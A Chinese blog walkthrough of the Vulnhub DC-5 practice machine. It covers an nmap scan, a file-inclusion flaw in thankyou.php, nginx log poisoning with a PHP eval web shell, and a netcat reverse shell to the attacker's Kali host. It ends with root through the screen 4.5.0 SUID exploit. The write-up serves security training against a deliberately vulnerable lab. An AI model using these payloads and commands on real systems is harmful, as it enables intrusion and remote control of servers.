Vulnhub靶机实战——DC-5

最新推荐文章于 2024-05-27 19:29:30 发布
最新推荐文章于 2024-05-27 19:29:30 发布
阅读量4.8k 收藏 9
点赞数 5
分类专栏: 靶机 文章标签: DC-5 靶机 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43583637/article/details/102769923
版权

靶机DC-5下载地址:https://download.vulnhub.com/dc/DC-5.zip

环境:VMware 15虚拟机软件

         DC-5靶机IP地址:192.168.220.139

         Kali的IP地址:192.168.220.145

 

DC-5靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.168.220.145

ip addr

使用nmap工具扫描192.168.220.0/24网段发现存活主机,扫到DC-5靶机IP为:192.168.220.139

nmap -T4 -sP 192.168.220.0/24 -oN nmap220.sP

使用nmap工具对DC-5靶机扫描开放的端口,开放端口有80(http)、111、41363

nmap -A -T4 192.168.220.139 -p- -oN nmap139.A

使用浏览器打开靶机网址,页面如下

http://192.168.220.139/

打开Contact页面,发现是一个留言板块,在留言板块输入内容并提交

http://192.168.220.139/contact.php

页面跳转到Thankyou.php,并且在URL地址栏可以看到参数,GET方式传参

http://192.168.220.139/thankyou.php?firstname=1234&lastname=1234&country=canada&subject=12121

当刷新页面时发现Copyright © 2017 一直在变化,猜测页面存在文件包含

使用BurpSuite抓包,爆破后台页面,发现存在index.php,solutions.php,about-us.php,faq.php,contact.php,thankyou.php,footer.php七个页面

 

在浏览器打开footer.php页面,确认文件包含页面是footer.php

http://192.168.220.139/footer.php

使用BurpSuite爆破文件包含的变量名,及后台passwd文件存在位置

变量名:file,passwd文件位置:/etc/passwd

http://192.168.220.139/thankyou.php?page=footer.php

http://192.168.220.139/thankyou.php?file=footer.php

地址栏输入,打开passwd文件

http://192.168.220.139/thankyou.php?file=/etc/passwd

使用BurpSuite抓包爆破靶机日志文件的位置,爆破成功

/var/log/nginx/error.log

/var/log/nginx/access.log

使用BurpSuite修改数据包数据,向日志文件中写入一句话木马,打开日志文件可以看到成功写入

http://192.168.220.139/thankyou.php?file=/var/log/nginx/access.log

http://192.168.220.139/thankyou.php?file=/var/log/nginx/error.log


GET /hello-world! <?php @eval($_REQUEST[666])?> HTTP/1.1

使用中国蚁剑连接,成功获取后台文件及虚拟终端

在服务器/tmp目录下新建一个shell.php文件,写入一句话木马并重新连接

文件shell.php内容如下:

1234567890
<?php
@eval($_REQUEST[666])
?>

打开shell.php文件,并使用蚁剑连接到虚拟终端

http://192.168.220.139/thankyou.php?file=/tmp/shell.php

使用蚁剑虚拟终端反弹shell到kali

nc  -e  /bin/bash  192.168.220.142    4567

在kali监听4567端口接收shell

nc -lvvp 4567

切换shell外壳

python -c 'import pty;pty.spawn("/bin/bash")'

使用find命令,查找具有suid权限的命令,发现screen-4.5.0

find / -perm /4000 2>dev/null

查找可用于screen 4.5.0的漏洞脚本文件

searchsploit screen 4.5.0

cp /usr/share/exploitdb/exploits/linux/local/41154.sh  41154.sh

cp /usr/share/exploitdb/exploits/linux/local/41152.txt  41152.txt

将41154.sh中上面一部分c语言代码另存为libhax.c

编译libhax.c文件

gcc -fPIC -shared -ldl -o libhax.so  libhax.c

将41154.sh中下面一部分c语言代码另存为rootshell.c

编译rootshell.c文件

gcc -o rootshell rootshell.c

将41154.sh中剩下部分代码另存为dc5.sh脚本文件

并在保存dc5.sh文件输入 :set ff=unix ,否则在执行脚本文件时后出错

使用蚁剑将libhax.so 、rootshell 、dc5.sh三个文件上传到服务器的/tmp目录下

为dc5.sh增加可执行权限,执行dc5.sh文件,成功获取到root权限

www-data@dc-5:/tmp$ chmod +x dc5.sh

www-data@dc-5:/tmp$ ./dc5.sh

获取root权限后,进入root目录下,成功获取thisistheflag.txt文件

冠霖L
关注
  • 5
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
Vulnhub靶机实战——DC-6
冠霖L的博客
10-28 3874
靶机DC-6下载地址:https://download.vulnhub.com/dc/DC-6.zip 环境:VMware 15虚拟机软件 DC-6靶机IP地址:192.168.220.139 Kali的IP地址:192.168.220.142 DC-6靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.168.220.142...
Vulnhub靶机实战——DC-3
冠霖L的博客
09-27 9024
靶机DC-3下载地址:https://download.vulnhub.com/dc/DC-3.zip 靶机DC-3VMware下载地址:https://download.vulnhub.com/dc/DC-3VMware.zip 注:开始将DC-3.ova文件导入VMware虚拟机,发现无法获取到靶机IP地址,作者在DC-3靶机下载页面提到可以下载已经搭建好的DC-3VMware,然...
DC-5靶机渗透测试
读书 买花 长大
03-14 1472
DC-5
渗透测试学习之靶机DC-5
xdbzdgx的博客
11-18 5628
1.下载靶机 本篇文章是DC靶机系列的第五篇,针对的是靶机DC-5,建议感兴趣的读者从DC-1开始练习,详细内容可以看我之前的文章。 DC-5的下载地址为DC: 5 ~ VulnHub。下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,点击重试即可成功,如果仍无法成功可百度、谷歌解决。 同样地,DC-5只有一个flag。 在VMware加载成功之后显示如下界面: 默认状态我们是打不开该系统的,也不知道账号密码的,毕竟我们的目的就是在不知道账号密码的情况下拿到roo.
DC-5靶机渗透测试过程(个人学习)
最新发布
m0_59028058的博客
05-27 1892
访问thankyou.php,每次刷新网页会发现底部的时间也随之改变,但在其他网页刷新页面发现是一个静态页面,无论怎么刷新都并没有任何改变,猜测在thankyou.php文件中包含footer.php文件,存在着文件包含漏洞。它的日志会被记录在/var/log/nginx/error.log 或 /var/log/nginx/access.log。访问日志会发现我们写的一句话木马,中 '' 被编码,则需要在burp中抓包,在数据包中写入马上传。直接在url后面输入
DC-5靶机渗透测试详细教程
啊醒的博客
05-04 6870
DC-5靶机渗透测试详细教程
DC-5 靶机实战
PigLL的博客
08-22 697
DC-5 靶机实战 实验环境: 靶机DC-5 攻击机:kali 使kali和DC-5在同一网段,都在NAT模式下 1.信息收集: 首先确定kali的IP 扫描同网段存活的主机 因为kali的IP为192.168.137.136 所以确定DC-5靶机的IP为192.168.137.143 对DC-5进行端口扫描 ...
靶机6 DC-5(过程超详细)
honest_gg的博客
09-26 829
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场。
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
DC-5入门练习
Mr_helloword的博客
07-20 560
DC-5靶机渗透 1. 信息收集 1.查看dc-5主机mac地址 2. nmap扫描 nmap -sP 192.168.1.0/24 -oN nmap.sP nmap -A 192.168.1.6 -p 0-6635 -oN nmap.A 发现目标靶机地址为192.168.1.6 查看目标主机开放那些端口 由于开发80我们登录随便看一看 这些网站页面都放在根目录下,我们可以用御剑扫描后台,发现最后一个页面这里可以提交表单,参数(都显示在url里) 发现每次刷新网页下面都会变化 2.御剑扫描
DC-5靶机渗透详细步骤
wwxxss
10-18 703
DC5渗透测试
DC系列(5)DC-5靶机渗透
Nikris的博客
01-12 993
DC-5
靶机渗透测试实战——DC-5
weixin_45116657的博客
10-30 6660
实验环境: 目标机DC-5的IP地址:未知(192.168.85.144) 攻击机kali的IP地址:192.168.85.139 实验步骤: 1、主机扫描,确定目标主机 命令:arp-scan -l 2、端口扫描,确定详细服务 命令1:nmap -sS -Pn -A -p- 192.168.85.144 命令2:nmap -sV -p- 192.168.85.144 #-sV —— 用来扫...
[网络安全学习篇73]:渗透测试实战-DC-5-靶机入侵
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
05-23 1427
引言:我的系列博客[网络安全学习篇]上线了,小编也是初次创作博客,经验不足;对千峰网络信息安全开源的视频公开课程的学习整理的笔记整理的也比较粗糙,其实看到目录有300多集的时候,讲道理,有点怂了,所以我就想到了通过写博客(课程笔记)的形式去学习它,虽然写博客会让我多花几倍的时间去学习它,但是当我完成一篇博客所获得的成就感和你们对于我的认同感,让我很满足,能够鼓励我一天天的坚持下去,也希望和我一起学习本期视频的"同道"们也能给一直坚持下去。我们大家一起加油。由于作者本身也是网络信息安全小白,大部分知识点都是初
靶机15 DC---5(最简单的方法)
wj33333的博客
11-04 122
1.arp寻找IP2.nmap扫描端口.3.发现rpcbind,详细扫描4.查看80端口5.扫描目录6.查看/thankyou.php发现新页面。
vulnhub靶机——raven: 2
09-03
- *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值